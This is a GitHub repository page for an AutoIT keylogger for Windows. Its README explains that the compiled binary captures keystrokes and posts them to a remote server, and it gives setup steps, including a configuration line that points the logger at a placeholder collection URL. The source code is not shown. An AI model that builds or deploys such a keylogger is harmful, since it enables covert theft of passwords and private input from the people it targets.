Skip to content

Yet another key logger made with AutoIT, a small tool for windows automation.

Notifications You must be signed in to change notification settings

orymeyer/AutoIT-Key-Logger

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 

Repository files navigation

#Introduction

This a keylogger written in autoIT and can be compiled into a windows binary using AutoIT.The compiled file can listen for keystrokes and logs them to a remote server.For educational purposes only.

##Instructions

  • Download AutoIT from here and optionally SCITE.
  • Edit the keylogger.au3 file and set the following line to your server URL.
$postServer="www.myserver.com/log"
  • Deploy on your machine.

About

Yet another key logger made with AutoIT, a small tool for windows automation.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages